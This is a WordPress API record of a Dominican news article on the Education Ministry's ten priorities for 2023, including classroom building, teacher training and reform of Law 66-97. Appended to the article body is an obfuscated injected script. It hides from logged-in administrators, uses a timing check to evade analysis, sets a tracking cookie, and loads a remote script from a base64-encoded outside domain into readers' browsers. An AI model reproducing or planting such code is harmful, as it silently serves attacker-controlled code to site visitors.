{"id":13030,"date":"2023-01-03T14:58:17","date_gmt":"2023-01-03T18:58:17","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13030"},"modified":"2023-01-03T14:58:17","modified_gmt":"2023-01-03T18:58:17","slug":"las-diez-prioridades-de-educacion-para-este-2023","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13030","title":{"rendered":"Las diez prioridades de Educaci\u00f3n para este 2023"},"content":{"rendered":"<p>Santo Domingo. &#8211; El Ministerio de Educaci\u00f3n (<strong>MINERD),<\/strong>\u00a0a trav\u00e9s de un comunicado, anunci\u00f3\u00a0<strong>las 10 principales prioridades del Sistema Educativo preuniversitario para este 2023<\/strong>, enfocadas en el aprendizaje oportuno, la formaci\u00f3n docente y el fortalecimiento del marco normativo que rige el sistema.<\/p>\n<p>El Ministro \u00c1ngel Hern\u00e1ndez precis\u00f3 que la gesti\u00f3n que encabeza se encamina en este nuevo a\u00f1o a impulsar la\u00a0<strong>construcci\u00f3n de m\u00e1s aulas, especialmente para preescolar<\/strong>, a realizar un concurso de\u00a0<strong>monitores de arte y t\u00e9cnico-profesionales<\/strong>, as\u00ed como a regularizar, mediante concurso de credenciales, a los\u00a0<strong>directores interinos<\/strong>.<\/p>\n<p>Adem\u00e1s, el MINERD conducir\u00e1 sus esfuerzos hacia la formaci\u00f3n de directores en\u00a0<strong>liderazgo pedag\u00f3gico, equipamiento de polit\u00e9cnicos y liceos de arte, y elaboraci\u00f3n de sus propios libros para la docencia.<\/strong><\/p>\n<p>Otras de las prioridades son la\u00a0<strong>formaci\u00f3n de los docentes de los primeros grados<\/strong>, la creaci\u00f3n de\u00a0<strong>centros de innovaci\u00f3n y creatividad<\/strong>\u00a0en el nivel secundario, el fortalecimiento del\u00a0<strong>rol de los directores<\/strong>\u00a0de centro y la\u00a0<strong>supervisi\u00f3n del proceso educativo.<\/strong><\/p>\n<p>Igualmente, el Ministro Hern\u00e1ndez trabaja para una normativa que est\u00e9 acorde con los tiempos actuales y garantice el aprendizaje de los estudiantes. En ese sentido, conform\u00f3 una\u00a0<strong>comisi\u00f3n encargada de revisar y modificar la Ley General de Educaci\u00f3n 66-97<\/strong>, para transformarla en una pieza congruente con los actuales d\u00edas, que promueva\u00a0<strong>derechos e inclusi\u00f3n social<\/strong>.<\/p>\n<p><em>\u201cEstamos comprometidos con transformar la educaci\u00f3n dominicana, para que nuestros ni\u00f1os obtengan aprendizaje de calidad a temprana edad de la mano de profesionales del magisterio altamente calificados\u201d,<\/em>\u00a0manifest\u00f3 el Ministro Hern\u00e1ndez.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211; El Ministerio de Educaci\u00f3n (MINERD),\u00a0a trav\u00e9s de un comunicado, anunci\u00f3\u00a0las 10 principales prioridades del Sistema Educativo preuniversitario para este 2023, enfocadas en el aprendizaje oportuno, la formaci\u00f3n docente y el fortalecimiento del marco normativo que rige el sistema. El Ministro \u00c1ngel Hern\u00e1ndez precis\u00f3 que la gesti\u00f3n que encabeza se encamina en este [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13032,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13030","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13030"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13030\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13032"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}